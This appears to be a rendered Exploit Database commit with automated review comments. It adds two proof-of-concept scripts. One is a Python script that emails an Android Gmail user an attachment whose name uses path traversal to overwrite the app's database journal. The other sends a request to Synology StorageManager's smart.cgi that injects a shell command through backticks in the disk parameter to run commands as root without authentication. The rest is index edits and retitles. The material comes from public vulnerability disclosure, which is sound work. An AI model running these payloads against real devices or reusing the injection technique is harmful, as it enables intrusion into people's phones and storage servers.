DB: 2017-11-29
4 changes to exploits/shellcodes

Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting
YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting
NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation
Synology StorageManager 5.2 - Remote Root Command Execution
This commit is contained in:
parent
dc5ab6ac54
commit
cc349de5d3
4 changed files with 186 additions and 4 deletions
115
exploits/android/dos/43189.py
Executable file
@ -0,0 +1,115 @@
'''
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342
There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:
1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo) account
2) the file can not overwrite an existing file, it has to be a file that doesn't already exist
3) there user has to click to download the attachment (and the path looks a bit weird on the screen)
It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory.
Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again
Content-Type: multipart/mixed; boundary="---
-714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello
To: <address>
From: natashenka@google.com
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html><body><b>test</b></body></html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="test"
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
------714A286D976BF3E58D9D671E37CBCF7C
'''
import os
import sys
import smtplib
import mimetypes
from optparse import OptionParser
from email import encoders
from email.message import Message
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import subprocess
import random
def main():
FROM_ADDRESS = "YOUR FROM ADDRESS HERE"
YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello image2adfdfs1
To: """+ TO_ADDRESS +"""
From: """ + FROM_ADDRESS + """
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html><body><b>test</b></body></html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="%2e%2e%2fqpng"
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
------714A286D976BF3E58D9D671E37CBCF7C"""
s = smtplib.SMTP_SSL("smtp.gmail.com")
s.login(FROM_ADDRESS, YOUR_CREDENTIAL)
you = TO_ADDRESS
s.sendmail(FROM_ADDRESS, you, composed)
s.quit()
if __name__ == '__main__':
main()
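Review bot: the message quoted in the leading docstring and the one the script actually sends are not the same: the docstring shows `Content-Type: multipart/mixed; boundary=...` with `Content-Disposition: attachment; filename="test"`, whereas `composed` uses `multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1` and `filename="%2e%2e%2fqpng"`. Either make the two consistent or state in the docstring which variant was the one observed to reproduce the crash. Also drop the unused imports (os, sys, mimetypes, OptionParser, encoders, Message, the MIME* classes, subprocess, random); only smtplib is used.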
67
exploits/cgi/webapps/43190.py
Executable file
@ -0,0 +1,67 @@
'''
SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution
Full report: https://blogs.securiteam.com/index.php/archives/3540
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD
Vulnerability Summary
The following advisory describes a remote command execution vulnerability
found in Synology StorageManager.
Storage Manager is “a management application that helps you organize and
monitor the storage capacity on your Synology NAS. Depending on the model
and number of installed hard drives, Storage Manager helps you accomplish
the following tasks:
Create different types of RAID and non-RAID storage configurations, such as
volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
Monitor the overall storage usage of your Synology NAS.
Inspect the health of installed hard drives and solid state drives.
Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and
more.”
Credit
An independent security researcher, Nigusu Kassahun, has reported this
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
Synology has released patches to address this vulnerability – DSM 5.2-5967-5
For more information: https://www.synology.com/en-global/releaseNote/DS210+
Vulnerability details
User controlled input is not sufficiently sanitized, and then passed to
execve function.
Successful exploitation of this vulnerability enables a remote
unauthenticated user to run commands as root on the machine.
The vulnerable parameter can be found in
/webman/modules/StorageManager/smart.cgi with parameter
action=apply&operation=quick&disk=%2Fdev%2Fsda
Proof of Concept
===
'''
# Synology StorageManager <= 5.2 Remote Root Command Execution
import httplib
HOST = raw_input("Enter Host: ")
#IDOR to bypass auth and ticks to chain commands
conn = httplib.HTTPConnection(HOST)
conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")
res = conn.geresponse()
print res.status, res.reason
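Review bot: `res = conn.geresponse()` is a typo for `conn.getresponse()`, so the script raises AttributeError immediately after sending the request and never reaches the `print` of the status line; fix the call. The script is also Python 2 only (`httplib`, `raw_input`, `print` statement), which the header comment should say. Finally, the comment `#IDOR to bypass auth` does not match the advisory text above it, which describes the endpoint as reachable by an unauthenticated user rather than as an object-reference bypass; reword the comment to match the advisory.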
@ -1 +0,0 @@
pdf
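Review bot: the rendered page does not name the file this one-line removal belongs to, and its only content is the word `pdf`, i.e. a placeholder rather than a real document. The commit message should record which database entry this placeholder stood in for and why it is being dropped, instead of only listing the entry's title among the retitles.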
@ -5760,6 +5760,7 @@ id,file,description,date,author,type,platform,port
43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple,
43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
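Review bot: the new 43189 entry is filed as type `dos` under `exploits/android/dos/43189.py`, but the advisory text in that file describes an arbitrary file write through path traversal that can modify the EmailProviderBody database, with the repeated crash being a side effect of the PoC rather than the vulnerability class; consider whether `dos` is the right type. The `< 7.11.5.176568039` fixed-version bound also appears nowhere in the added file, so the file's header should cite where that bound comes from.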
@ -9145,7 +9146,7 @@ id,file,description,date,author,type,platform,port
40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux,
40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64,
40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux,
40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux,
40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows,
40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,
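Review bot: the retitle of 40839 splits the quoting into `'Dirty COW' 'PTRACE_POKEDATA'`, but the neighbouring 40847 entry keeps the old single-quoted form `'Dirty COW /proc/self/mem'`; apply the same split there (`'Dirty COW' '/proc/self/mem'`) so the two Dirty COW entries are titled consistently.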
@ -26169,7 +26170,7 @@ id,file,description,date,author,type,platform,port
22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php,
22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php,
22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows,
22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php,
@ -32715,7 +32716,6 @@ id,file,description,date,author,type,platform,port
32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080
32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80
32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php,
32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php,
32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php,
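Review bot: with the +/- markers not rendered, which of the seven lines this 7-to-6 hunk drops has to be inferred from the commit message, which lists NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation, i.e. entry 32667 (`exploits/hardware/webapps/32667.pdf`, port 80). Removing a database entry deserves a stated reason in the commit message (the one-line `pdf` file deleted in this same commit suggests the referenced PDF was only a placeholder) rather than being listed alongside plain retitles.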
@ -38227,3 +38227,4 @@ id,file,description,date,author,type,platform,port
43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware,
43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,
43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware,
43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi,
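Review bot: the new 43190 entry titles the target as `Synology StorageManager 5.2`, while the added file's own header says `<= 5.2` and its vendor-response section names the fixed release as DSM 5.2-5967-5; make the version bound in the title precise (a bound on that build) so it is clear which releases are affected and which carry the fix.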